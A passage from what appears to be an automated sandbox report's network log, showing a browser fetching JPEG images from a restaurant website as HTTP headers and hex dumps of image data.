                                                                                                                                                    Data Ascii: <?xpacket end="w"?>XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkpt
                                                                                                                                                    2024-10-01 04:26:32 UTC8211INData Raw: 27 af 4b da 7f 08 fd 6a d4 df e2 6b f8 67 ff 00 67 27 fa 53 ea 69 e9 e3 fa 35 40 70 bf 36 22 84 89 3d 53 c8 c4 ca 6e ad 0e 0a b9 37 d2 db 57 22 fa 1e da f4 6b f3 b8 7a 49 ff 00 e9 bf fa 58 df c2 fe 4d bf cb aa 78 18 7f 34 62 13 c9 9d eb 1e 42 5c 74 82 6f 2c 0c 44 83 f7 c1 09 8d bc d2 f3 dc 2b 8f 12 6c f1 d7 bb e3 7c ed 79 37 9a eb eb 7f 3d db ee fe 9d 5c 39 b8 74 9a db 8d 7b 7e 57 9d 7f ee 7f cd cf ff 00 ec 24 ff 00 84 7e 3f f8 18 ff 00 c6 fe eb e0 f8 bd bf d5 af a5 e5 7d bf f9 7e 97 e2 bf 87 f3 bc be 1a 7d 9f 83 cf b3 ff d0 f9 a9 f7 29 f1 0a d2 23 b8 50 6b cc 3d 28 98 6e 68 d0 a0 22 db aa 53 25 59 2a 34 c5 24 69 41 21 b8 d0 31 8d 88 f9 0e 14 ca 91 77 6f 36 bd 4b 70 b2 65 d9 fa 73 0e 2e 32 f3 e2 48 b2 65 32 d9 e6 7b 1d 3b 96 dd 05 79 b9 36 bb 3d 3c 7a c8
                                                                                                                                                    Data Ascii: 'Kjkgg'Si5@p6"=Sn7W"kzIXMx4bB\to,D+l|y7=\9t{~W$~?}~})#Pk=(nh"S%Y*4$iA!1wo6Kpes.2He2{;y6=<z


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    46192.168.2.449795162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:32 UTC389OUTGET /assets/imgs/featured-image-03.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:32 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:32 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 27 Sep 2023 23:56:52 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 80554
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:32 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:32 UTC16031INData Raw: ff d8 ff e1 29 a2 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: )ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:32 UTC5499INData Raw: d2 7e df ce fa 1f f1 8a 98 19 0e cb b5 d8 f5 3a c3 00 0d ac 36 00 5f b0 32 5a d6 bb dd f9 ac fd f5 b9 89 f5 61 ef ac 3f 3e e7 e2 dc 61 b5 62 d3 58 b5 cd 83 ee 7d cd 7d 9f 43 e9 fe 85 96 fa 89 65 9c 61 21 29 4c 44 7e ef 54 e3 12 90 22 31 32 5f a7 bb fc 9b 89 ff 00 12 d4 47 bb dc 3e 1f c4 a3 33 a6 5f 8b 45 38 ed 7b 6e 6d 60 54 d7 8d cc 2e 20 96 7f 37 73 58 e6 fb be 9a 05 f5 59 4d af ae e6 9a ec ae 5b 63 0e 8e 04 7d 26 aa d6 0c a4 46 ba b7 e3 a4 62 0e f4 12 d6 db 0e d1 5b 45 a4 82 e7 56 d2 4b da 3f 31 cf 03 da c6 3d df eb 5a 3d 36 35 e2 5a 7e 89 2d 70 d4 10 e1 1b 9a 67 fa ca 54 d9 95 85 7b 32 2e c7 6e 4b 69 63 58 2b f4 ff 00 40 e2 5a 1f 57 ac c7 39 ff 00 45 b6 6f f5 3f d2 a1 1c 6c a6 d7 f6 86 b0 b1 84 97 fa 6d 20 c1 3a b9 b4 b7 6f a8 ec 7f e4 6f 4c bb 17 dc
                                                                                                                                                    Data Ascii: ~:6_2Za?>abX}}Cea!)LD~T"12_G>3_E8{nm`T. 7sXYM[c}&Fb[EVK?1=Z=65Z~-pgT{2.nKicX+@ZW9Eo?lm :ooL
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: b3 89 59 f5 9c 46 a5 cd fe 21 ca ab bd 31 6b a6 1a f0 e3 3a f3 af 82 b1 84 6c f5 de fa dc d7 02 08 d8 e9 6c 13 f9 cd 78 dc 9b 28 93 13 11 fb 82 99 22 40 36 7f ce 16 8b c3 9b 65 83 80 f7 1d c0 e8 0e a5 c1 4a ba bd 43 0c d4 f8 76 5a 0d c5 71 e5 cc 23 c2 09 0a 2f c1 0e 27 e8 c8 d4 72 d8 fb 94 a1 8f 80 bf ff d0 a1 d4 21 b9 2f 24 49 de e8 ee 89 d4 89 7f 4d c2 b1 ba 17 63 b8 08 ec 40 a8 b7 f2 2b 99 7d 1b 3f 22 f7 8a 98 18 e0 e0 47 ab ed 06 47 d1 6b a1 df f5 28 79 b8 77 d3 d3 f1 28 c8 6e db a8 16 57 6b 24 10 25 bb 9b ee 6f d2 6e c5 94 32 44 e2 c5 44 71 42 5a c7 f4 a8 f1 3b 04 7a c8 ee 1a df 57 18 1b 56 68 06 49 15 12 7e 57 34 a6 eb 61 c7 12 bd 82 48 b4 1f 96 d7 a3 74 6d 81 f9 2d 66 a1 d5 34 cf 63 05 df 47 fc e4 dd 40 17 e3 b4 0f de 69 d3 c2 1c 9f 31 5c e7 d6 3f
                                                                                                                                                    Data Ascii: YF!1k:llx("@6eJCvZq#/'r!/$IMc@+}?"GGk(yw(nWk$%on2DDqBZ;zWVhI~W4aHtm-f4cG@i1\?
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 3b 9e a1 36 d0 9e e7 91 15 61 1e 07 bd 5a 7b 20 7f 42 a9 fe 21 dc 9e 60 9d eb fa f5 9b 12 e0 b6 64 2e 45 a8 35 2c 64 91 94 79 18 6f a5 7c 52 32 81 33 ec 69 d3 4a 0e f4 cd 2e 85 4c 4d 76 e9 ae 74 e1 14 2a 55 d8 9d 76 a4 ac 84 5c 0d ba d7 5c 64 95 90 49 d7 63 a5 05 c2 54 1a e1 36 3b 53 ad 74 a2 4b 81 08 54 f1 92 29 db 43 e3 ec d7 12 b9 06 9e 11 b9 df 6e a7 4e 05 39 0f f2 57 db e3 ec d2 a6 32 ff d6 f3 b9 29 1e 16 37 24 3a a0 0a 4f 8a 86 32 a5 0f e9 1b ea be a1 c4 85 a9 a4 40 01 6b ff 00 b6 ae 6d c2 b8 f4 5c ff 00 8d f2 4c be 5b 8b e5 3d 4b c6 e0 ed b8 b7 35 c6 18 a3 6c 6e 43 0f 76 d7 f0 c5 72 ec c2 44 b7 b8 99 63 56 78 47 9b 41 45 2a 48 60 6d ad 7d 24 44 87 f8 f8 e0 80 bf b5 35 3c f1 39 0c be 8b 5e 64 f8 b7 a2 f9 8f 54 24 cc 9e 3d 73 67 cc ef 78 c4 39 cc 54
                                                                                                                                                    Data Ascii: ;6aZ{ B!`d.E5,dyo|R23iJ.LMvt*Uv\\dIcT6;StKT)CnN9W2)7$:O2@km\L[=K5lnCvrDcVxGAE*H`m}$D5<9^dT$=sgx9T
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: f5 ea 19 c0 b9 88 7c 9b 78 c9 3a da de fa ce 6b 2b e5 e4 7f 53 67 61 2a 4f 7c d3 3c df 1d ba 83 e6 b0 00 f6 ec 3c 37 1e dd f5 7b 38 8c 0e 4c a9 81 0c 41 19 ab 5f f9 8f 8e 49 6c 6e 1b 31 65 f4 d4 1d cd 24 a8 bf 30 04 54 31 07 70 76 db 4d 15 22 72 29 be 94 c1 c9 2d f9 97 a9 9e 8d f0 eb 69 af 39 06 53 0e 5e 15 f3 5e 0b 64 8a e2 e2 83 7a d2 30 48 3f 89 1a 61 a5 4e 58 98 83 d4 14 d0 95 71 80 91 1d 65 62 bc ff 00 af 9e 8f 7a a0 f9 3c 3f 07 c3 f2 6e 29 73 8b 22 e2 5e 45 7d 6b 77 8f b1 b8 8e bf c4 40 b2 23 c6 f5 06 a3 e2 53 e2 2b d3 59 4e 74 2d a3 16 85 31 ab 78 2c c7 f9 76 85 aa e4 e6 bb bd 49 09 0d c4 77 4b 61 f9 aa f4 7c 7f 8b e5 c2 c1 17 2a c6 e4 de e2 8a 6d e2 37 4d 22 54 13 56 5e ee d6 fd 5b 6a 8e 9d b8 98 6c 47 52 ba ab 76 46 26 0f f2 4c 8c 42 e3 b1 b8 ac
                                                                                                                                                    Data Ascii: |x:k+Sga*O|<<7{8LA_Iln1e$0T1pvM"r)-i9S^^dz0H?aNXqebz<?n)s"^E}kw@#S+YNt-1x,vIwKa|*m7M"TV^[jlGRvF&LB
                                                                                                                                                    2024-10-01 04:26:32 UTC9872INData Raw: 2d a3 cf 6e 10 28 8a 24 69 3e 52 c1 89 11 a9 24 d2 87 f1 d4 30 b4 94 ea 93 4c 38 19 e3 91 67 46 c2 f8 7a 00 54 c0 9c 8b 66 32 1d 69 4b 8a f5 2b 96 5b b3 db 4b 98 5b cb 0b 41 e5 58 e3 32 30 43 73 18 8d 0f 6a a3 79 8a 5a 80 0e 80 ed ad 0d 4b 68 98 87 0f bf 6a c5 5b f3 3a b4 e7 21 a9 83 96 d9 dc 98 f8 ef 56 f1 62 d5 9b 92 7a 6f 61 90 b7 8b b4 4d 79 85 bd b8 c5 cc c1 be 1a 88 dc 5c c2 4d 4d 6a 54 68 29 f2 fb 79 96 31 63 c3 0f 8f 92 ba a5 cf ee 69 c7 53 b8 1b d8 f7 fd 55 a1 f9 a7 a3 f3 24 6a dc 83 90 71 2b 86 8d 5b c9 cb d8 a5 e4 24 9f 05 b8 b0 7a 80 2b fb d1 68 13 c9 04 83 d3 91 71 d0 7e 87 b1 59 9f 72 d3 a6 40 ac 00 7d ce 3e 79 85 f5 1e 13 01 9f 41 71 86 cd 61 f9 18 1b 23 43 32 f7 d4 9a 0a ac ab 1b ad 7f 0d 57 d4 b7 af 42 5a 77 f1 fa a3 a8 df da dc 87 8c 83
                                                                                                                                                    Data Ascii: -n($i>R$0L8gFzTf2iK+[K[AX20CsjyZKhj[:!VbzoaMy\MMjTh)y1ciSU$jq+[$z+hq~Yr@}>yAqa#C2WBZw


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    47192.168.2.449796162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:32 UTC386OUTGET /assets/imgs/special-menu-3.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:32 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:32 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:24 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 86437
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:32 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:32 UTC16031INData Raw: ff d8 ff e1 2b 22 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 06 40 00 00 01 01 00 03 00 00 00 01 04 2c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 38 3a 31 35 3a 31 33 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: +"ExifMM*@,(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 18:15:13
                                                                                                                                                    2024-10-01 04:26:32 UTC5499INData Raw: 88 e1 82 71 61 24 dc f5 73 b0 3a 15 55 64 59 75 c7 d5 c1 c7 1b 9f 4c 6f 7e f7 1d 8d 6b 01 d8 c7 ff 00 a5 7b bf e0 ff 00 49 bd 69 b7 a6 55 75 05 c2 90 1a 2a 0f af 2c 06 53 f4 b6 be bf 51 ce 15 bd ce 6c 33 63 f6 b1 ff 00 a5 fe ba b5 d2 86 51 ea 2e c7 66 23 ee 75 d5 b8 d6 d6 7d 26 80 3d ef 27 da cf 49 f5 fb 3e 9f f3 de 97 fa 45 7f 1f 7d b6 db 83 75 56 52 5b ee 2e b3 42 e0 3d db 76 3b 6b 9b 66 ef e7 7f f0 35 9f cd 64 cd 19 f1 1b a8 81 ea fd 1f fd 1d bd cb c3 17 05 0a ee 62 75 a7 81 ba 8b fa 86 6b 68 ac 1b de 43 8b 1b 6b da 64 b4 6f b5 b3 63 bd 1d d5 c3 be 87 f3 8b a5 c0 fa 8f f5 84 e3 55 65 38 7e 9d 85 c1 f5 df eb d4 c0 d8 f7 32 d6 be 9b 2e b7 73 7f 37 d3 57 ed e8 9b f3 ac b9 96 b2 b6 e4 91 35 d8 08 8b 5a 5c f6 d9 8e f6 96 3e ab 3f 9c b1 de 9f e7 ab 3d 0f eb
                                                                                                                                                    Data Ascii: qa$s:UdYuLo~k{IiUu*,SQl3cQ.f#u}&='I>E}uVR[.B=v;kf5dbukhCkdocUe8~2.s7W5Z\>?=
                                                                                                                                                    2024-10-01 04:26:32 UTC16384INData Raw: 63 fd 15 bc 7e 16 1b ef b0 06 8d 3b 95 d4 74 de 99 5d 70 e6 11 e0 7e 3e 45 57 39 04 76 d1 b1 1c 60 e8 5f 5b ad f8 5d 4b 11 b7 52 f6 e4 63 5a 25 8f 1f eb b9 8f 6f e7 31 cb 32 fc 3b f0 1f ea 54 4b a9 fc 9f 15 cd f4 ce a1 93 d2 6f 36 e3 bb 73 5c 7f 4f 49 d1 8f fb b7 6c b3 f7 2e ff 00 3f d8 bb 5e 9f d4 70 fa a6 39 b7 18 cc 69 6d 4e fa 6c 27 b3 db fc af cd 7f f3 6f 4f 84 c4 fc 24 b2 50 94 3c 62 86 8c aa 32 e9 75 17 b4 3d 8f 1b 5e c7 6a 08 2b 2f eb 37 43 a1 dd 36 c7 e1 4d 30 09 3b 09 01 92 0b 5f 6d 7f 9d 5e e6 fb 1f b3 fe 31 5e cd e9 8f ad c7 23 13 b6 ae af ff 00 22 a1 8f 9f 5d f5 bb 1f 22 61 e0 b5 e2 48 24 1f 6b 84 8f a2 a3 cf 8c 4e 06 26 20 c8 7c 84 fe f3 26 1c 92 84 84 a2 4f 08 3e a8 db cb e2 62 16 e1 d0 cc 8b 1d 91 7d 22 19 1b 8e 84 37 6b 5c d0 5c df 51 d5
                                                                                                                                                    Data Ascii: c~;t]p~>EW9v`_[]KRcZ%o12;TKo6s\OIl.?^p9imNl'oO$P<b2u=^j+/7C6M0;_m^1^#"]"aH$kN& |&O>b}"7k\\Q
                                                                                                                                                    2024-10-01 04:26:33 UTC16384INData Raw: 2c c4 89 39 80 a5 89 1a 1a 90 c8 d3 d7 9a 68 2b c7 38 90 a8 8d 28 91 df 5a a0 54 f5 ff 00 54 9b 71 6f 57 14 55 c4 0b c2 7f eb d5 14 46 a7 b9 20 73 97 90 b5 7a c7 eb 75 20 4d 4b 76 39 b4 af 6a 55 f4 d9 3d 7e 5b 22 22 c1 a3 93 96 0c ab 43 88 6d 28 e4 57 58 c2 ce 51 e2 a7 66 78 e7 af 76 09 81 55 70 43 26 7b 27 eb ca 1b 31 24 76 28 da 8e 65 78 8c 93 c8 2b 55 ea 5b 6b 0c 6b 1c 85 99 e6 b0 02 d7 96 67 af 35 1a 92 be a2 11 76 e3 da af 7f 4d 70 d8 ae a7 06 7b e5 df cd f6 ef d3 97 08 b3 ec 14 3c 3b 78 a5 b1 1d af 1c d0 b8 4e f0 cb 37 04 c9 3f 62 e1 cb 45 3f 2d 24 ad 19 bc 92 c0 86 28 44 51 19 5e 8b 4d 1d 8a fd 62 d6 c7 1a 45 0e b6 0e a5 01 e9 1b 1e 9c fd 9f 26 2b 1e 66 5e 62 ab c8 6d 8d 18 b6 14 76 3e ab 3e af 36 1a ab 77 26 f4 ef 57 8b 5f 43 6f ec 1b fd 60 af ed
                                                                                                                                                    Data Ascii: ,9h+8(ZTTqoWUF szu MKv9jU=~[""Cm(WXQfxvUpC&{'1$v(ex+U[kkg5vMp{<;xN7?bE?-$(DQ^MbE&+f^bmv>>6w&W_Co`
                                                                                                                                                    2024-10-01 04:26:33 UTC16384INData Raw: 91 7f d5 5c 7a 78 9b e3 45 3f c3 56 9b dd fa 66 bf e1 28 3f b2 05 33 7b b8 37 bb b5 56 3d 36 42 5a 3b fe 24 32 66 e0 fe ce a5 d3 ca 8c 9a ad 3b b4 72 00 2f 66 53 66 f9 b5 9e 57 ce ad dd 00 03 42 34 d8 05 f0 c2 de 5a 28 e8 aa 63 f4 5e f6 a3 1a d9 23 62 05 86 e1 40 46 02 e1 96 d6 db 6f 15 31 66 56 88 63 93 61 04 f8 6b d9 0f 8e e7 61 a2 b9 cc 6c 0e 04 1b 0b f8 71 a1 9d 85 a9 48 01 db 66 3b 85 21 7c 30 a3 d1 b5 c1 bd ad 89 07 6d 58 e0 db fd 14 33 e3 73 86 17 d9 4c 55 48 0b c5 b6 c4 0a cf 20 b8 b0 f9 4d 2a 2e 38 71 56 6c 4b 0d ed 45 90 1b 5f 13 e8 ae 21 68 d7 70 bd cd 1b 6c be d1 b2 89 c9 98 8f e7 a2 09 b1 02 e4 50 6b 5f b2 dd 94 32 10 2c 3e af d2 69 5c 8b ba 70 f6 0a c4 8d bf 1f cb 58 02 70 b9 a0 c8 6e 0e ff 00 83 d3 4f aa d2 db dd fe f2 38 99 a3 5f 67 21 ff
                                                                                                                                                    Data Ascii: \zxE?Vf(?3{7V=6BZ;$2f;r/fSfWB4Z(c^#b@Fo1fVcakalqHf;!|0mX3sLUH M*.8qVlKE_!hplPk_2,>i\pXpnO8_g!
                                                                                                                                                    2024-10-01 04:26:33 UTC15755INData Raw: 51 d4 82 76 03 be f5 f9 37 4e be ab 49 19 cd a5 26 e7 51 0a 8e 3e 98 7f ff 00 77 4d cf 1f de c7 4b aa d1 bf 53 49 2b 07 47 5d aa c0 f7 fc 12 44 df 58 95 34 12 a1 8a 6d 3e 2c e7 08 d8 31 22 36 89 9a cc d9 d7 8d bb 94 ab 3d 96 78 c5 b4 fa 95 36 78 c9 c4 71 77 a2 cd cf 13 54 e9 a8 8f 24 f0 89 57 51 15 81 4b a8 e8 9e 93 61 93 ab ce 95 14 2f 03 b9 62 5d 3a ab 75 b7 d4 96 d3 b8 3f 32 a3 91 d1 91 59 c2 88 5f 61 3e aa f9 aa 58 c0 55 84 02 50 b6 d0 49 cd f3 f8 a9 0c 68 a9 3f 4d 64 25 09 64 71 bb a8 97 f6 52 ad 4d 21 52 44 2b 9d 94 6d b8 19 98 2d 17 f7 82 18 8b 90 73 66 cc 00 23 86 f9 29 ba 3a 92 34 c8 3a 66 35 37 cc 08 da ca 46 4c 99 bc d5 a4 7d 77 b2 53 9c 6a 30 2d 15 d7 ea 9d a1 4c d9 79 b8 f8 fa 15 92 5d 44 ed a5 85 af 0b e9 d7 2c 76 b5 97 89 32 47 93 27 d8 54
                                                                                                                                                    Data Ascii: Qv7NI&Q>wMKSI+G]DX4m>,1"6=x6xqwT$WQKa/b]:u?2Y_a>XUPIh?Md%dqRM!RD+m-sf#):4:f57FL}wSj0-Ly]D,v2G'T


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    48192.168.2.449797162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:32 UTC386OUTGET /assets/imgs/special-menu-1.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:32 UTC353INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:32 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:06:26 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 57952
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:32 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:32 UTC16031INData Raw: ff d8 ff e1 21 4d 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 02 e3 00 00 01 01 00 03 00 00 00 01 01 9f 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d6 87 69 00 04 00 00 00 01 00 00 00 ec 00 00 01 24 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 37 3a 32 36 20 31 38 3a 31 32 3a 33 30 00 00 00 00 04 90 00 00 07 00
                                                                                                                                                    Data Ascii: !MExifMM*(1"2i$''Adobe Photoshop CC 2015 (Windows)2022:07:26 18:12:30
                                                                                                                                                    2024-10-01 04:26:33 UTC5499INData Raw: ff 00 e5 b9 4f 04 e3 3b 24 d5 8f 8c f6 5f 5e a5 c1 cd 68 1b 41 7f 1b 7f b2 9a 62 78 3a fa 75 15 5c 37 fd 66 d8 02 27 70 07 9b d1 62 66 62 53 8c 36 34 b7 a8 51 b5 ad b5 f0 76 ed 8f 56 bf 47 76 d7 55 6b 43 58 fb 54 72 2c 76 41 b1 95 96 b6 bb 5f be 8b 01 90 d7 91 f4 6d 6b bd fe 86 e7 b9 bb d5 13 73 2d dc 48 0c c8 ac 06 3c 82 27 40 1d 0f fe ae ef dd f6 7f c5 a5 8d d3 b3 5a 3e dd 5d e0 b5 d2 e3 53 c3 81 83 f9 ad d3 6b f7 fd 26 7e 62 84 0e fa 56 c0 a6 a3 13 c5 7f 31 de ed 07 5d c2 17 53 8d 95 4d 6d 65 d6 fa 34 dd 58 6f e9 05 b2 e6 3a d7 6d f6 bb 77 b7 fa e9 ef e8 f7 1c ec 6f ab 8d 73 1b 7b 5c f3 63 f7 7b 1d 6c fb 7d f1 f4 7d 43 bf e8 7f c1 a3 d5 7d ae ea 7d 38 64 3a 6a 19 15 ba c3 10 23 73 1c cd d0 84 72 2e 1f 59 c3 9b b9 d7 1c 92 d7 fb 75 69 f5 7d 2f e5 3f d2
                                                                                                                                                    Data Ascii: O;$_^hAbx:u\7f'pbfbS64QvVGvUkCXTr,vA_mks-H<'@Z>]Sk&~bV1]SMme4Xo:mwos{\c{l}}C}}8d:j#sr.Yui}/?
                                                                                                                                                    2024-10-01 04:26:33 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii:
                                                                                                                                                    2024-10-01 04:26:33 UTC16384INData Raw: 24 62 df 71 3d a1 04 93 ba b7 b1 c5 37 82 01 3d 94 61 19 24 b3 90 2c 48 a9 0f 61 29 9e d0 5c fe 3e a0 59 26 6e 59 08 fd 93 fe b3 b6 84 a7 65 cf 96 c6 4d 86 88 93 05 19 24 24 c5 04 2f 62 b5 98 ff 00 d7 ac b3 4d 0f a5 e5 89 88 11 b2 47 14 49 35 5a dc 92 5b b1 cf 66 39 ba 6b d5 c7 43 ce 38 dc 0f b1 c9 a9 65 7b 8a 1c 5a 51 1b dc a7 62 ba fa 90 d3 e8 cc 82 59 61 a9 14 fd 94 4d 82 73 62 f3 92 af 66 ca 24 29 2f af 0c 85 99 4c 88 62 98 3a 98 46 eb 58 70 a0 c9 66 50 dc 73 a9 af 1c f7 3f a2 48 e1 b3 62 65 75 ad c9 9e 12 e8 a5 ff 00 59 1c e2 33 1c 8f 5c 09 ce f2 d7 ae 20 31 53 63 f9 aa e6 0e b2 43 e6 b8 c1 f8 b2 da 12 3e 3e 6f 15 70 2a ee ed f5 ad 05 bb b7 6e 9e 9c 9b 30 54 eb 92 09 6e 46 be e9 57 64 55 79 85 2a 52 c0 5a 8b 2b 57 8e 05 91 99 65 4a b1 4d 14 dd 92 a4
                                                                                                                                                    Data Ascii: $bq=7=a$,Ha)\>Y&nYeM$$/bMGI5Z[f9kC8e{ZQbYaMsbf$)/Lb:FXpfPs?HbeuY3\ 1ScC>>op*n0TnFWdUy*RZ+WeJM
